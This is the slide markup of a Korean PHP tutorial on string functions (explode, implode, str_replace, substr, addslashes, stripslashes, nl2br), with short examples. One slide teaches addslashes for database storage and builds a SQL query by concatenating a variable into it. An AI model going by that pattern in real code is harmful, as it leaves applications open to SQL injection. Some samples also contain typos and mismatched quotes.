            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>$str=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>a.b.c.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>$arr=explode(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>“.“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t> ,$str);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>echo("$arr[3]");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="180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ko-KR" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:tint val="88000"/>
                    <a:satMod val="150000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt; 문자열 다루는 함수 &gt;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191000" y="1219200"/>
            <a:ext cx="4572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ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>implode 함수 &gt; &lt;join 함수&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  배열로 나뉘어진 문자열을 한         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   문자열로 합침</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>string implode(string connector, array val)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  $str=array(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“05</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  $arr=implode(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>",  $str);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  echo("$arr");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?&gt;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191000" y="1066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>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="265113" indent="-265113" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>str_replace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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="547688" lvl="1" indent="-200025" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(string from, string to, string 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)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="547688" lvl="1" indent="-200025" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>문자열에서  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>에 해당되는 문자열을 찾아   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>에 해당하는         문자열로 치환</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="265113" indent="-265113" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>    &lt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="265113" indent="-265113" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>        $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="hello world hello";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dirty="0" smtClean="0"/>
              <a:t>        $res=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>("hello","hi",$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);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dirty="0" smtClean="0"/>
              <a:t>        echo("$res&lt;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&gt;");            // hi world hi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dirty="0" smtClean="0"/>
              <a:t>     ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t> 함수</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>str중</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>strat와</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>length에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> 의해 추출된 문자열을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>리턴함</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>res</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>(“abcdefg”,1);   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>bcdefg</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>res</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>(“abcdefg”,1,3);   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>bcd</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>res</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>(“abcdefg”,-3);   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>efg</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>res</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>(“abcdefg”,-3,2);   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>ef</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>res</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>(“abcdefg”,3,-1);   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>res</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>(“abcdefg”,1,-3);     //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>bcd</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>res</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>(“abcdefg”,-6,-1);   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>bcdef</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>res</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>(“abcdefg”,0,-1);   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>abcdef</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="265113" indent="-265113" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx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442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addslashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>특수문자 ‘, ” ,  \등에 \(백슬러시)를 덧붙여주는 함수</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>addslashes(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>문자열 혹은 변수)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>DB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>에 특수문자가 포함된 데이터 저장에서 사용</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>stripslashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>\ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>백슬러시)를 제거하여 주는 함수</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>를 사용하여 붙여진 \를 제거함.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>stripslashes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>문자열 혹은 변수)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/>
              <a:t>&lt;?   $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>a=“shim’s house”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>       $b=“select * from db_table where keyword=“.$a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>       echo $b;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>       $a=addslashes($a);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>       $b=“select * from db_table where keyword=“.$a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>       echo stripslashes($a);      ?&gt;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3200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:tint val="88000"/>
                    <a:satMod val="150000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt; 문자열 관련 중요 함수 &gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24734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nl2br</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>을 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>br&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>태그로 변환하여 주는 함수</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>string nl2br(</a:t>
            </a:r>
            <a:r>
